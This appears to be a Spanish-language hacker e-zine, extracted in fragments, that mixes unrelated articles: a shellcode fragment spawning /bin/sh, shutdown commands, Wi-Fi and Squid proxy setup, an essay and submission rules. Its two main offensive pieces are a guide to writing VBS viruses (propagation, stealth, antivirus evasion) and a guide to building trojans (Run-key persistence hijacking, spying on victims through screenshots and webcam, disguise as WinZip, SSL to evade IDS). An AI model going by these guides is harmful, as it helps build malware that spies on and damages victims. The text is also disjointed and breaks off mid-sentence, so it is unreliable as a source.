"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
Referencias:
FreeBSD
halt
Esto tirará el sistema correctamente, sabrás que el equipo se dio de baja al ver este
mensaje.
Bajo este punto puedes apagar el sistema o presionar una tecla para volver a cargar
el sistema operativo. Otra línea que ejecuta la misma función que halt es:
shutdown -h now
shutdown -r now
Para iniciar damos en Inicio --> Ejecutar --> command --> Enter. Ok, se abre
MSDOS.
C:\
C:\shutdown [enter]
Y a continuación se despliega:
Ejemplos:
shutdown -i [enter] | Se nos muestra una interfaz grafica mas agradable al usuario...
Pero recomiendo hacerlo todo desde comando, así aprenden mas.
shutdown -l [enter] | Por medio de esta línea cerramos nuestra sesión activa
shutdown -a [enter] | Por medio de esta línea anulamos el apagado de sistema. Incluso,
no les ha sucedido que les sale un mensaje de "Se apagara el sistema en 60 segundos"... Por
medio de esta línea anulamos eso. Después bájense el parche de Microsoft.
Donde:
-s = apagar
-m = refiriéndose a remotecomputer
\\computadoraremota = refiriéndose a la máquina a apagar
-t = time (tiempo) 30 = valor de 30 seg
-c = Refiriéndose a usar comentario
Comentarios finales:
Espero las líneas anteriores hayan servido para aumentar la biblioteca de
conocimiento que poseen en su mente y no utilicen lo antes expuesto para apagarle la
máquina a un compañero y de hacerlo, explíquenle como -a nularlo :)
Indudablemente quien no ha escuchado hablar por ahí en estos últimos días sino es
que mucho antes, sobre términos tales como:
• bluetooth
• wi-fi
• wireless
• 802.11a
• 802.11b
• 802.11g
Primero que nada te preguntaras,.. ei si eh escuchado algo acerca de ello pero no se que
diantres sea? o que ventajas y/o desventajas conlleva?
NOTA: Al aumentar el numero de PC's en nuestra red esto repercutira en el ancho de banda
y el tiempo de acceso a los recursos que se esten compartiendo.
Y siendo así este dispositivo que a su vez se conecte por medio de cable de red a
nuestro "Modem/Router ADSL" que tiene la salida a INTERNET (mencionado
anteriormente).
PROS
CONTRAS
• En ocasiones debes perforar paredes, pues no es muy estético tener el cableado por
ahí.
• Tomando en cuenta el punto anterior también necesitaras accesorios para ocultarlo.
• Si decides hacer tu la instalación, necesitas contar con la herramienta adecuada.
• Si no haces tu la instalación necesitas contratar a alguien que cobrara por cada
servicio.
• Necesitas mas hardware y por ende implica el incremento de nuestro presupuesto de
la red.
OK, yo se que muchos de uds. son unos verdaderos geeks y se las ingenian para
economizar y optmizar su LAN PARTY, quise decir su LAN. <<<fucking Quake...>>>
PERO, para aquellos que no son unos auténticos geeks si deben tomar en cuenta los
factores arriba mencionados, válgase alguien sin experiencia, una empresa, un holgazán,
etc.
Para todos aquello(a)s interesado(a)s en implementar YA una red, porque así sus
necesidades lo ameritan. Hoy en día hay una manera FACIL, COMODA, RAPIDA y
PRACTICA, ahh... y te hace ver muy geek si sales con tu laptop y un capuccino para
sentarte por ahi en un sitio público como en algún parque charlando vía irc con tus
camaradas y soltando tremendas carcajadas mientras en otra sesión estas con tu novia
Esta bien, esta bien estoy ansioso, "escupe lupe". Calmado Nerón no te aceleres que
todo es con calma y mucha paciencia.
Las respuestas obviamente son de acuerdo a la situación y necesidades de cada quien, pero
para ayudarte a responder y no verme ogt te pongo un tabulador a tu disposición para tomar
la decisión que mas se apegue a tus necesidades.
Pequeño tabulador de opciones hecho por mi, para hacer una red inalámbrica (wireless,
pues)
Y ya es todo lo que necesito saber? ei, ei, ei!!! eso me huele a insatisfecho o a
holgazán. Mmmm... Digamos que de cierta manera si, es un idea básica de lo que necesitas.
Ahhh tengo una duda antes de que sigas. ...Si dime. Ok mira tengo que conectar en
red laptos y PCs de escritorio y pues no se si tenga que verificar algunos datos extra para
cada tipo de computadora? En realidad NO pero SI jajajaja, esto es debido a que tu PC de
escritorio tiene ranuras PCI o entradas tipo USB para insertar una tarjeta de red
inalámbrica, pero tu laptop tiene entradas del tipo PCMCIA y también entradas USB. Y...?
mira, el tipo de tarjetas que la gente usa comúnmente (casi el 90%) para sus laptops son del
tipo PCMCIA pero si por alguna razón requieres utilizar una USB, adelante. Ahh y si
puedes ponerle una tarjeta PCI inalámbrica a tu laptop me dices como le hiciste. :-) no seas
ogt.
Ahora entiendo!!! compraré tarjetas wi-fi para mis dos laptos del tipo PCMCIA y
para mis dos PC de escritorio comprare dos tarjetas wi-fi del tipo USB y luego? Muy bien
ya vas entendiendo mejor todo este asunto de los dispositivos wi-fi :-D
Consejos:
1. Recuerda que tu Access Point al igual que tus tarjetas wi-fi en las PC's y en las
laptos irradian su señal de alcance y puede que algún curioso se entere que tienes
un suculento enlace ADSL a 2Mbps y pues vaya corriendo a hacerse de equipo wi-fi
y acabe por consumir de tu ancho de banda furtivamente o rastrear la información
que manejas en tu red wi-fi. Así que para que tu Access Point no sea fácilmente
detectable por algún tipo de escanner wi-fi que alguien use, desactiva una opción
llamada BROADCASTING, esto es para no responderle al escanner cuando te haga
un barrido.
2. Ponle un password al Access Point para que nadie mas pueda alterar tu
configuración ya fijada algo como "q085nd63bt9s" y no uno como "tu_nombre" o
"nombre_del_access_point"
3. Encripta los datos que puedan fluir por tu red wi-fi, te preguntaras como... no es así?
pues dentro de las opciones de tu Access Point puedes activar una opción donde
diga "WEP Encryption" y ahí tendrá niveles de encriptación a escoger, tu
seleccionaras el que mas te sienta seguro para que haya cierta anonimidad de los
datos en tu red wi-fi y van desde 64, 128 y 256 bits sino es que mas, ah y entre mas
fuerte sea el nivel de encriptación consumes algo mas de recursos.
El tipo de red que acabas de implementar es una red llamada de tipo "infraestructura".
Son aquellas que requieren de un punto de acceso (Access Point) para establecer un enlace
con otro miembro de la red.
Los dos tipos de redes principales que nombrare son de los cuales se derivaran otras
modalidades en su forma de interactuar los sistemas y el access point. La primera es la que
acabos de describir anteriormente:
NOTA: Como comentario hago la aclaración de que a la hora de configurar una red,
especifiquen como será su forma de trabajar, ya sea por medio de infraestructura (access
point) o de igual a igual (ad hoc). Pues ese detalle mal configuración en los clientes de la
red puede ocasionar un mal funcionamiento o ni si quiera funcionar, así que ojo con ese
detalle.
Para terminar hago la aclaración que hay distintos modos de hacer una red wireless.
Pues en la actualidad no se puede limitar solo a pequeñas redes caseras sino que también a
grandes redes corporativas que pueden abarcar varios cientos de kilómetros; pero para ello
se involucra mas equipo de radiocomunicaciones como son antenas de alta ganancia, cable
para radio-ondas que manejen la frecuencia de los 2.4ghz ó 5ghz. Conectores especiales
además de su configuración y mantenimiento del cual dependerá su buen funcionamiento.
Ya te toparas por ahí en la internet como modificar tu equipo de wi-fi casero para
aumentar su rango en afán de crear un enlace mas largo y tener una red con los cuates u
optar por practicar wardriving en las afueras de la ciudad a ver que encuentran. Te comento
que si deseas hacer esto debes contar con conocimientos mínimos de electrónica,
radiocomunicaciones, y pues comprender e interpretar los términos como pigtail,
omnireccional, panel sectorial, conector N macho o hembra, dbm, dbi, mW, etc. Por citar
un ejemplo.
Debo agradecer a toda la gente que hace posible este e-zine tanto al team oficial
como usuarios constantes y dedicados a compartir el conocimiento con los demás. Yo como
lector y colaborador me siento agradecido con la gente que se toma la molestia de leer estos
artículos, pues nos dan mas ganas de seguir con esto, para que aprendan algo y lo lleven a
la practica con útiles aplicaciones. Me despido con un cordial saludo y p
En este texto vamos a configurar un servidor Squid – Proxy Cache en una máquina
tipo UNIX , en este caso GNU/Linux , nuestro objetivo principal es que los usuarios de la
Red-Local (LAN) pueden conectar las máquinas tipo Windows, Linux, Apples, etc., como
clientes al servidor GNU/Linux (Squid) para poder “Cachear” páginas WEBs y acelerar la
conexión a internet.
¿Que es Squid?
¿Hardware Requerido?
Aquí voy a poner mi ejemplo y lo que estoy utilizando para mi red local, mi
máquina que hace squid la llamo: squid.blackbox.drops.com.mx ésta tiene una IP fija
192.168.0.1. Nota : El dominio blackbox.drops.com.mx es un dominio para mi red local.
¿Software Requerido ?
Squid-2.5-Stable1 www.squid-cache.org
Httpd-2.0.x (Apache) www.apache.org
IPTables-version-nomeacuerdo. (la mas nueva) www.netfilter.org
Kernel 2.4.23 www.kernel.org
* Todos los parches de seguridad necesarios para tu Distribucion GNU/Linux.
Instalación de Squid.
Una ves instalado correctamente todo lo necesario , manos a la obra. Squid trabaja
con un archivo de configuración “squid.conf”, este archivo esta por lo regular en
/etc/squid/squid.conf con este archivo vamos a trabajar, este mide aproximadamente
90kb, para ser un archivo de texto es algo larga la configuración, pero eso que no nos
asuste. Bien, antes de empezar con la configuración vamos a hacerle un backup a
squid.conf, listo?, ahora tomamos nuestro editor de textos que mas nos guste y abrimos
squid.conf.
Squid.conf
Pasamos a # MISCELLANEOUS
Bien, hasta aquí nuestro archivo de configuración, a guardar los cambios. Ahora
pasamos a nuestra amada consola bash, vamos hacer unas modificaciones de permisos,
agregar archivos, correr squid, crear un script en bash, etc. Como super usuario root.
]$ squid -z
Nota : No recuerdo que al crear los directorios, squid tiene que estar corriendo o no,
si nos da un error corremos squid y si esta corriendo lo detenemos. También si nos da un
error al crear los directorios, vemos el porque y vamos de nuevo al archivo de
configuración /etc/squid/squid.conf, una ves creados y que todo salga bien pasamos a
lo siguiente.
/etc/init.d/squid start
/etc/init.d/squid stop
/etc/init.d/squid restart
/etc/init.d/squid status
IPTables
Se preguntarán para que queremos usar iptables con un servidor proxy-cache, bueno
explico, con iptables puedes re-dirigir puertos, re-dirigir-ips, enmascaramiento, filtrado de
paquetes, re-envío de paquetes, etc. Así que utilizaremos iptables para forzar a los usuarios
(clientes) a usar Squid-Cache. Vamos a crear un Script en Bash.
#!/bin/bash
# Descripcion :
# Este es un simple script escrito en bash para forzar a los usuarios de
la Red (LAN) a usar Squid-Proxy Cache.
# En este script tenemos dos interfaces de red eth0 y eth1 , donde eth0
es la interface de Internet ,
# este ira conectado al Router o en mi caso el cable de red que viene de
mi modem Infinitum , la interface eth1
# ira conectado en mi caso a un Switch 10/100 de 24 puertos.
# eth0 = Internet
# eth1 = Red Local
# Nota: Nuy importante , este script no pretende ser un Corta-Fuegos o
Firewall.
# FLUSH de reglas
iptables -F
iptables -X
iptables -Z
iptables -t nat -F
Bien, aquí termina nuestro script, lo guardamos con un nombre por ejemplo forza-
squid, solo basta darle permisos de ejecución y que el administrador del sistema lo corra,
para darle permiso sería chmod 750 forza-squid y para correrlo seria algo así ./forza-
squid y listo. Ahora bien, si no queremos meternos en problemas con el script basta de
configurar cada cliente web, por ejemplo en IE 6.x : Herramientas – Opciones de Internet –
Conexiones – Configuracion Lan – y palomeamos donde dice Servidor Proxy , donde dice
dirección y puerto pondríamos la IP del servidor en mi caso 192.168.0.1 y puerto 3128,
luego Opciones Avanzadas – y palomeamos donde dice Usar el mismo servidor para todos
los protocolos , y por fin todo configurado. Pero aquí tendríamos unos problemas , que un
usuario quite la configuración de su navegador y pueda ver todo Internet, otro problema es
que si tenemos mas de 100 máuinas por configurar nos tardaríamos algo de tiempo ir una
por una.
Es acaso una realidad dentro de otra realidad ?— habrá que contemplar un sin fin
de ideas para llegar a una relativa conclusión; pues llegar a una hipótesis de tener idea que
tenemos la conclusión materializada es una utopía demasiado desmesurada. En el mundo
materializado donde todo es producto de la actividad inteligente del ser humano mezclada
con su fuerza bruta la sensación de sentirse libre es meramente limitada a unas cuantas
reglas impuestas por seres que se marcan como autoridad donde deciden privar a alguien de
su libertad, de su vida o de sus sueños. Fabricar grandes magnitudes como elementos
químicos o armas, es lo que se le conoce como estrategias militares en beneficio para lo que
llaman seguridad nacional, en realidad no hemos cambiado del todo en nuestra fase de
evolución de raciocinio pues tenemos la imagen de llegar a ser el ser humano perfecto, la
nación perfecta, la raza perfecta sin importar pisar a los de al lado que tienen las mismas
raíces y antepasados que los nuestros. Cuando llegamos después de un día arduo de trabajo
a nuestra estación de trabajo en casa; sin importar la existencia de una tecnocracia nos
ponemos cómodos para iniciar una sesión en combinación con nuestra mente llenándose de
mil y un imágenes donde nos visualizamos que estamos con nuestros seres queridos, revisar
la cartelera en busca de una buena película para el fin de semana, buscar un sitio en la
ciudad donde pasar un rato agradable, de vacaciones en un lugar que jamás conoceremos en
vida, visitando museos a largo del planeta, leer un buen artículo, presenciar un evento como
si estuviéramos ahí en ese mismo instante, ver como está el clima en el otro extremo del
globo o sencillamente mandar un correo mientras escuchamos una obra maestra de música
de algún conservatorio, así se transforma nuestra forma de sentir y pensar; enfocándose a
esa pantalla y par de diodos emisores de luz que se prenden y apagan deleitando nuestras
pupilas llenas de jubilo mientras nos sentimos mas libres; aun mas que un ave
emprendiendo su vuelo en el cielo o que un animal en cautiverio fuera de su jaula o un
sentenciado a muerte declarado inocente.
El tiempo pasa a estar en segundo plano mientras nuestra mente está conectada a la
fuente de bits que transcurren en nuestro torrente neuronal y nuestra estación que ahora no
es tan solo una caja de metal, conteniendo tarjetas y circuitos impresos con chips de silicio
integrados; sino que se ha convertido en nuestra extensión de nuestra propia estructura
humana. Tenemos una interfaz que nos da la bienvenida a donde la vida deja de medirse en
los latidos que pueda dar nuestro corazón o nuestra fuerza corpórea; para fusionar nuestros
impulsos electromagnéticos con los latidos de nuestro microprocesador y crear con ellos
nuestra realidad. Edificar la comunidad que deseamos, aliar nuestras objetividades con
nuestros iguales, crear una obra de arte para generar un sentimiento de placer en nuestro
interior y buscar compartir nuestras creaciones con el mundo exterior que nos rodea, dentro
de esta misma orbe, mientras tanto, estando fuera de nuestra realidad hacemos presencia de
una falsa paralipsis. La revesa de nuestras ideas suben de tono y nivel conforme nos
adentramos en este nirvana y pasado nuestro momento en este lugar,… mustiamente nos
desconectamos.
Estos son los requisitos y pasos para los artículos del Ezine, espero que los lean y
los sigan, de esta forma pueden ayudar a que la ezine sea mas fluida.
Se pueden usar viñetas, tabulaciones y tablas. El inicio de cada párrafo deberá de ser
dentado. El cuerpo del documento será con el Font (Tipo de letra) Times New
Roman número 12, y el código, notas, pasos a seguir, o cualquier otra cosa que
amerite cambiarte el font será con el Courrier New del número 10, el título de tu
documento será con el font Times New Roman 14 en Negritas, tu nombre o
sobrenombre y tu dirección de email serán con Times New Roman 12. Un ejemplo
de cómo quedaría tu documento sería el siguiente :
10. Saludos. Si para la realización de tu documento recibiste ayuda de alguien mas que
tú consideres que aparezca su nombre o sobrenombre pues hazlo, pero no envíes
saludos de mas en tu documento.
12. Archivos adicionales. Si tu tema requiere de archivos adicionales hay que hacer
referencia a ellos en el documento y mandar el archivo empaquetado junto con el
documento.
Notas adicionales.
Inicio
Un poco de historia de VBS
¿Como Empezar?
Lógica
Propagación
Cerebelo
Mecanismos de Stealth u ocultamiento
Recomendaciones
Despedida
Inicio
Estos archivos son simplemente un "script" que no necesita ser compilado ya que la
utilidad que los lee simplemente va ejecutando sus códigos lineales, el programa que se
encarga de esto en Windows es "wscript.exe", que si lo renombras ya no te funcionara
ningún VBS, esto puede ser alguna alternativa para no ser infectado, pero puedes llegar a
tener problemas con las páginas en internet; también estos archivos pueden llegar a ser una
alternativa como una segunda arma en un troyano, pero esa es otra historia....
Han existido y seguirán existiendo muchos virus creados con este lenguaje, algunos
famosos y otros no tanto; Como olvidar a "Zulu" que en lo personal, fue uno de los
pioneros de la carrera en la creación de virus VBS que engañan a los usuarios; en el año de
99-00, con su famoso código de "Stages" si bien fue hecho en VBS fue el primero en
mostrarse como un archivo normal de texto "LIFE_STAGES.TXT.SHS" pero con la
extensión ".shs", esta extensión era poco conocida para muchos, se puede describir como
Shell Scraps que son ejecutables de Windows rundll32 o también conocidos como archivos
objeto basura, también fue el primero en usar 4 métodos de propagación que fueron, la
libreta de direcciones, mIRC, las unidades mapeadas y por medio del pIRCH, recordemos
otros tantos como el encantador Happytime (con su ingeniosa forma de contagio por medio
del Outlook, donde todos los correos salientes llevababan su archivo como fondo por
defecto), no podemos olvidar a Loveletter(con sus enormes errores de lógica y
programación, logró sumarse al topten de los virus mas peligrosos que han existido en la
¿Cómo empezar?
Si tienes en mente crear un virus con VBS ya sea por diversión, venganza o
destrucción trata de echarle cerebro a los métodos heurísticos de un antivirus y como poder
engañar a un usuario medio avanzado, con esto trato de dar a entender, que si un antivirus
esta actualizado puede ser difícil de burlar ya que si tomas códigos de otros virus o si eres
flojo y testarudo y no usas nada moderno o ingenioso para la propagación, estarás fuera del
medio, o simplemente tu código será fácilmente detectable, "un programador no se puede
dar el lujo de crear un código que ya fue creado, pero eso sí, se puede dar el lujo de
mejorarlo", ten en cuenta que cada línea debe de ser profundamente analizada para tener un
menor nivel de desgaste al codear, nunca recomiendo que uses generadores de virus ya que
ponen la misma basura para todos, pero no estoy en contra, pero tampoco son de mucho
agrado.
Lógica
Todo virus lleva una lógica que se divide en varios pasos simples o al mismo tiempo
llegan a ser complicados, los que se encuentran entre corchetes pueden ser pasos
opcionales, así es como yo siempre he visto esta clase de virus:
[Atrapar Errores]
Copia de sí mismo
[Modificar archivos de texto o crear.]
Engañar al infectado
Modificar el registro
[Exposición de dialog de aviso en pantalla]
[Crear worm]
Propagación
Propagación
• MS Outlook
• Clientes IRC
• MS Exchange
• Unidades de red
• Redes peer to peer
• Propio servidor SMTP
Los bug's mas recientes suelen ser una de las mejores opciones para tratar de
propagarse a mayor velocidad, siempre hay que tratar de estar al día.
Las listas de correos han sido las mas usadas o las que se usan casi como estándar,
desde que se dio la noticia de poder obtener la lista completa de los contactos del
messenger, muchos virus se basan en ella para poder propagarse, no se necesita mucha
inteligencia ya que el código existe, solo es de copiar y pegar y por que no, tratar de
mejorarlo.
Una de las armas importantes es manejar perfectamente el Scripting para clientes IRC,
esto da un ventaja muy importante de otros programadores y por consiguiente de los
códigos.
Cerebelo
Para hacer un buen virus, se necesita algo que piense y que tenga neuronas activas y
al día, un buen cerebro debe de estar al día en los posibles bugs, técnicas, obras,
creaciones, o alguna aplicación que deje un hueco para comenzar a trabajar, ya sea algún
programa de mensajería o X cosa que vayas a utilizar, las fallas mas recientes de MS
Outlook pueden ser altamente explotadas por los virus para engañar a los usuarios, usa tu
cerebelo y explótalas al máximo.
Si tienes pensado usar un compresor para algún archivo, aquí algunos de los mas
importantes:
Algunos son mas conocidos que otros, ya sea por su facilidad, uso y rendimiento.
• Técnica de añadir: como su nombre lo indica el código del virus se añadirá al final
del archivo a infectar, después de esto el código del virus tomará el control para
poder ejecutarse antes que el archivo original y cederle el control al final de su
ejecución, esta técnica cambia totalmente el tamaño del archivo y es fácilmente
detectable.
• Armouring: en esta técnica el mismo virus impide que se examinen los archivos que
él mismo ha infectado, es como sellar la puerta con rejas de acero al salir de casa,
que solo se puede abrir con una herramienta especial, en el caso del virus con un
debuger, en el caso de la puerta necesitaras un wey del barrio de Tepito.
• Companion: se trata de crear una copia del archivo infectado con el mismo nombre,
como se imaginarán este tipo de técnica puede llegar a ser fácil de detectar por el
mismo usuario, pero los verificadores de integridad fallarán en la acción de detectar
este tipo de virus ya que estas utilidades solo buscan los archivos existentes,
pongamos un ejemplo: tenemos el notepad.exe, creamos su copia a notepad.com;
cuando se mande llamar al bloc de notas se ejecutara primero el .com esto ejecutara
el virus y después el verdadero notepad, sin que el usuario se percate de lo sucedido.
• Tunneling: esta técnica, intenta burlar los módulos residentes de los antivirus
mediante punteros directos a los vectores de interrupciones del DOS y el BIOS;
todas las interrupciones de los nuevos antivirus deben de ser conocidas por los
nuevos creadores de virus, ya que es una de las ramas importantes para obtener un
éxito triunfal; he estado checando que ya la mayoría de los VBS tratan de descargar
un pequeño programa desde la red para matar la mayoría de los procesos de todos
los antivirus que existen en el mercado, y así no tener la necesidad de hacer nada de
las otras técnicas para la ocultación ante los antivirus.
• Técnica Parse: esta es la última técnica que mencionaré, tengan en cuenta que no
son las únicas que existen. Esta consiste en instruir al virus bajo ciertos parámetros
definidos, secuenciales o periódicos, como por ejemplo, que infecte cada 10 veces
que se ejecute un programa, esta suele ser una forma muy práctica de minimizar el
ser descubiertos, pero su programación es tediosa y un poco improductiva.
Microsoft nos facilita la vida todos los días, tratando de crear todo para la facilidad del
usuario ya que como sabemos el 98% o el 99% del código de VBS es transportable a Visual
Basic y las rutinas que no lo son, puedes crearlas en el código de VB, esto nos puede servir
para poder generar nuestros VBS a .EXE y aparte con un poco de ingenio los antivirus no
lo detectarán, ten en cuenta que VB necesita librerías especiales, pero no creo que haya
problema con eso.
No siempre los virus creados en VBS son la mejor opción, como ya sabemos, pueden
formar parte de un todo o de una relación en cascada de lenguajes, por ejemplo, podemos
crear con C++ la rutina principal que cree un VBS y que este mismo herede las ordenes
principales que hay que realizar y al final el código principal de C++ elimine al archivo
VBS; esto solo es un ejemplo de lo que se puede realizar.
Puedes estar diciendo, esto ya lo sé, pero como chingaos hacerle para poder crear un
virus con tales técnicas, eso hace la diferencia entre un buen programador y los demás,
tengan en cuenta que las técnicas surgen de la nada y siempre un virus debe de ir un paso
más adelante del ingenio de los antivirus, por que hay veces que la tecnología la tiene ellos
pero el ingenio es de nosotros.
Recomendaciones
• Todo lo que vaya a usar tu virus debe de ser probado y confirmado para evitar
errores, para que no quede como muchos virus que se cuelgan en su ejecución.
• Captura todo error que pueda generar tu virus en la ejecución, ya que esto es algo
imprescindible para no ser detectado.
• Casi siempre un virus lleva dedicación o algún dato que es relevante en su código,
como para señalar al programador del mismo, siempre es importante saber porque
haces las cosas o que te inspira a hacerlas, ten en cuenta que es una de las formas de
decir: "aquí estoy, bésenmela"
• Este es un tip tonto pero muchas veces pasa, nunca posties en un foro parte de tu
código, si necesitas ayuda usa otras opciones, como preguntas directas.
• Se auténtico en tu código.
Despedida
Espero y les sirva esta pequeña guía para la creación de un buen virus, échenle
ganas y cerebelo; quiero agradecer a Arikel por el título. No olviden: "Los virus no son tan
dañinos como la ignorancia de los usuarios u Administradores(Dioses sin Olimpo)"
Antes de comenzar con esta segunda parte me gustaría agradecer mucho sus emails,
me gustaría poder responderlos pero el trabajo, la escuela, mi poca vida social y la paranoia
no me dejan hacerlo, pero tomé en cuenta sus comentarios para hacerle unas
modificaciones a esta segunda parte.
Auto Instalación
Es necesario que nuestro troyano se ejecute cada vez que el sistema es reiniciado, si
no pues no nos va a servir de mucho, para lo cual existen varios lugares en los que podemos
poner a nuestro troyano para que se ejecute : Autoexec.bat, Win.ini, System.ini y el registro
de windows.
Instalándolo.
Parte de este proceso ya fue explicado en la primera parte de este documento, pero
considero que es bueno retomarlo para dejar algunos puntos mas claros.
Función : instalado
Regresa : verdadero o falso
Ya vimos que lo primero que debe de hacer muestro troyano es ver si está instalado
o no (se sobrentiende que el troyano no mostrará nada, se ocultara desde un principio no
importando si se trata de Infector o de InstTroy), ahora veremos el proceso de la
instalación.
CopiarTroyano
Este punto es relativamente fácil, ubicamos una carpeta segura, podemos usar la de
windows\system o recycled, o la de archivos de programas (o program files cuando el
windows está en inglés), para ello sacaremos la información del registro de windows para
saber donde se encuentra instalado el windows y donde están sus carpetas.
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion]
"ProgramFilesDir"="C:\\Archivos de programa"
"SystemRoot"="C:\\WINDOWS"
Una vez ubicada la carpeta solo hay que copiar Infector a la carpeta y guardarlo con
el nombre de InstTroy (no se tome literalmente esto, ya que solo es un sobrenombre que le
puse para darme a enterder, tu ponle un nombre discreto), para posteriormente hacer que se
ejecute la próxima vez que se reinicie el equipo.
Autoejecución.
Hay que garantizar que la próxima vez que se apague y prenda el equipo nuestro
troyano siga funcionando, para lo cual hay que modificar algo para que se ejecute nuestro
troyano.
Si nos vamos tiempo atrás tenemos que el autoexec.bat es un archivo que se ejecuta
por default y que bien podemos agregar una línea para llamar a nuestro troyano, pero
recuerda que en este caso el troyano correrá en windows (porque no creo que alguien haga
un troyano que corra en MSDOS) y por lo tanto la línea a agregar debe ser de la sigiente
forma :
Win c:\carpetaX\troyano.exe /parámetros
\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Y aquí solo bastará agregar un nuevo valor y ya con eso hacemos que nuestro
troyano se cargue al iniciar windows. La diferencia entre HKLM y HKCU es que LM es
para todos los usuarios que se signan al windows y CU es sólo para el usuario que está
signado en ese momento. Un ejemplo es el siguiente:
"SmcService"="C:\\ARCHIV~1\\Sygate\\SPF\\smc.exe -startgui"
Este es mi firewall, aquí se instala para su ejecución (aunque le mueve otras cosas al
registro para poder ejecutarse antes que otro proceso).
Aquí mismo podemos hacer algo mas ingenioso para poder ocultar nuestro troyano,
voy a tomar de ejemplo mi mismo firewall para hacer una llamada a mi troyano y también a
mi firewall, de tal forma que los dos se ejecuten con la misma sentencia.
Lo que tendría que hacer nuestro troyano para asegurar su ejecución sería encontrar
una cadena en RUN que pudiera modificar, la cual debería de cumplir con la condición que
tuviera una terminación .exe o que en alguna parte tuviera un .exe, tal es el caso de mi
firewall. Este análisis es fácil, solo tomamos la enésima (N) cadena del RUN, vamos hasta
el final de ella y en regresión buscamos .exe, si no la encuentra va a la siguiente y si la
encuentra pues prosigue el proceso de instalación, todo esto hasta que N sea menor o igual
al número de registros en RUN.
"SmcService"="C:\\ARCHIV~1\\Sygate\\SPF\\smc -startgui"
C:\RutaTroyano\NuestroTroyano.exe
Smc.exe –startgui
Por ahí hay otro método usando rundll32.dll, pero eso requiere de cambiar la
estructura del programa para poder ejecutarlo con la llamada a una función que estaría
alojada en una dll y esto implicaría cambios radicales en la distribución del troyano ya que
la sola dll no puede ser ejecutada por el usuario.
Recursos.
Los recursos son las cosas (imágenes, sonidos, dlls, archivos, etc) que nuestro
programa necesita para poder funcionar en un equipo x. Tenemos que usar los menos
recursos posibles parar que el tamaño de nuestro ejecutable no se incremente demasiado.
Para que queden claro los recursos pondré de ejemplo a NetBus, este troyano venia con un
KeyLoger, pero necesitaba una dll que el mismo .exe lo traía como recurso, de tal forma
que al ejecutarse extraía la dll y la guardaba en el disco duro, para posteriormente mandarla
llamar y crear el hook que cacharía todos los movimientos del teclado.
Si optaste por usar visual Basic ten cuidado con las dlls y ocx que usa y aun mas
cuidado con las versiones de dichas librerías.
La puerta
El número del puerto. Una difícil selección, ya que hay que asegurarnos (bueno, no
creo que se pueda estar súper seguro al respecto, pero si hay que tratar de aproximarnos) de
que nuestro puerto no choque con otra aplicación que se esté ejecutando y para no
equivocarnos en este punto debemos tener unas dos o tres opciones mas, de tal forma que si
el troyano no puede abrir un puerto en especifico abra (o trate de abrir) el siguiente puerto
en nuestra lista. Ya existe una lista de puertos ya reconocidos (25 smtp, 21 ftp, etc) y si
conocemos a nuestra victima bien podemos elegir uno de estos puertos que sabemos que no
utilizarán. Trata de no utilizar puertos muy altos, eso pudiera levantar sospechas.
Un compañero de raza (dead) hizo una versión modificada del netstat.exe, el cual
sustituía al original y al momento de ejecutarlo filtraba algunos puertos ya previamente
identificados, esto no es de mucha ayuda, ya que se puede utilizar otros programas para
verificar las conexiones existentes pero de algo les ha de servir.
Pues ahí te va mi lista de cosas que no debe de hacer un troyano, esta lista es
personal y no se debe de tomar como dogma:
• Leyendas personales, dichos, epitafios, recetas de cocina, etc. Si quieres que se den
cuenta de que fuiste tu pues adelante, de lo contrario omite los comentarios.
En pocas palabras no debemos de dejar huella, nadie debe de saber que fuimos
nosotros, que alguna vez estuvimos ahí, que de nuestra mente chaquetera salió ese troyano.
Una vez vi un troyano bastante mal hecho, se llamaba (o por lo menos así lo
llamaba yo) detlog.exe, se conectaba a una ip fija para sacar una lista de rangos de ips que
el troyano debía de escanear para buscar clientes infectados con netbus, luego modificaba la
página de inicio por una ip que estaba un octeto arriba de la otra ip, sin contar de que si
llegaba a encontrar un cliente infectado con netbus le ponía password y enviaba un correo
(con la ip infectada) a una dirección de email con un dominio que se encontraba otro octeto
arriba de las otras dos ips, así que todo apuntaba a un solo lugar, bastante pendejo ese
troyano, espero que este no sea su caso.
Es tu troyano y puedes ponerle hasta flores, pero trata de ser objetivo y no poner
cosas de mas, entre menos cosas tenga menos probabilidades de error tienes.
La funcionalidad
Aquí les dejo una lista de las cosas que considero que no deben de faltar :
• Horarios de uso. Puedes generar un archivo con los datos de a que hora se prende el
equipo, a que hora se apaga, en que momentos permanece inactiva, etc, conocer a tu
victima te puede ser de utilidad para futuras versiones.
• Pantallazo. Siempre es bueno saber lo que está viendo el usuario. Utiliza jpg de baja
calidad para que la transferencia se más rápida.
• Webcam. Es interesante, pero consume muchos recursos, así que úsalo en casos
muy extremos.
• Archivos mas usados. Saber que es lo que usa tu victima mas frecuente será de
utilidad.
La distribución
Sólo se me ocurren tres formas de hacerlo: por un bug, con ingeniería social o
yendo directamente al equipo e instalarlo.
Por bug.
Casi siempre micro$oft saca el parche y explica que tiene un bug y luego sale un
gusano que se distribuye como pendejo por toda la red, así que bien puedes estar pendiente
de las nuevas vulnerabilidades e infectar a tu victima antes de que le aplique el parche
correspondiente a su equipo.
Ingeniería social.
• Consíguete el icono que usan los archivos del winzip, ten en cuenta que usa varios
dependiendo de los colores y resoluciones, bien puede programar tu troyano para
que use todos los iconos de winzip.
Conclusiones
Pues hasta aquí, espero que les sean de utilidad estas líneas; hacer troyanos requiere
de mucho tiempo, mucho ingenio, la precisión es básica, muchas horas de investigación,
pero al final, al verlo corriendo te hace sentir bien.
• Utiliza SSL (Secure Socket Layer) para intercambiar información entre el troyano y
tu cliente, algunos ids, firewall pueden omitir el filtrado de este tipo de paquetes.
Puede llegar a ser algo engorroso pero te puede ayudar.
Reciban un cordial saludo, no dejen que sus vidas se pierdan frente a un televisor y
pónganse a codear algo.
Muy bien, creo que todos los mexicanos sabemos que es C.F.E. verdad? y para los
despistados pues C.F.E. significa "Comisión Federal de Electricidad" y es quien nos
abastece de electricidad para que estés pegado a la computadora, o en los video juegos o
que se yo que haces ;), y por lo visto esta empresa es MUY GRANDE.
Hace ya un tiempo estuve trabajando para CFE (de gratis por cierto :(, ya que tenía
